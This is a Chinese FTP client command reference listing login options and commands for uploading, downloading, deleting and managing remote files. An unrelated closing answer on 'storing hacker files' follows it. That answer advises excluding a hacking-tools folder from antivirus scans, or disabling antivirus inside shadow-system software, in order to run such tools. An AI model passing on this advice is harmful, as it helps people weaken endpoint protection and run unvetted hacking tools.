
－n 限制ftp的自动登录,即不使用.netrc文件。

－g 取消全局文件名。

help [命令] 或 ？[命令] 查看命令说明

bye 或 quit 终止主机FTP进程,并退出FTP管理方式.

pwd 列出当前远端主机目录

put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中

get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中

mget [remote-files] 从远端主机接收一批文件至本地主机

mput local-files 将本地主机中一批文件传送至远端主机

dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件

ascii 设定以ASCII方式传送文件(缺省值)

bin 或 image 设定以二进制方式传送文件

bell 每完成一次文件传送,报警提示

cdup 返回上一级目录

close 中断与远程服务器的ftp会话(与open对应)

open host[port] 建立指定ftp服务器连接,可指定连接端口

delete 删除远端主机中的文件

mdelete [remote-files] 删除一批文件

mkdir directory-name 在远端主机中建立目录

rename [from] [to] 改变远端主机中的文件名

rmdir directory-name 删除远端主机中的目录

status 显示当前FTP的状态

system 显示远端主机系统类型

user user-name [password] [account] 重新以别的用户名登录远端主机

open host [port] 重新建立一个新的连接

prompt 交互提示模式

macdef 定义宏命令

lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录

chmod 改变远端主机的文件权限

case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母

cd remote－dir 进入远程主机目录

cdup 进入远程主机目录的父目录

! 在本地机中执行交互shell，exit回到ftp环境,如!ls＊.zip

最佳吧

如何储存黑客文件

1、把所有的黑客方面的东西放在一个文件夹下，然后设置杀毒软件，排除对改文件夹的扫描和查杀。

2、那就装一个影子系统或者是影子卫士等软件，模拟一个真实的环境，在影子模式中你可以关闭杀毒软件，然后测试和使用黑客软件，退出影子模式一切完好如初，这样还能避免一些黑客工具自带的后门或者是病毒。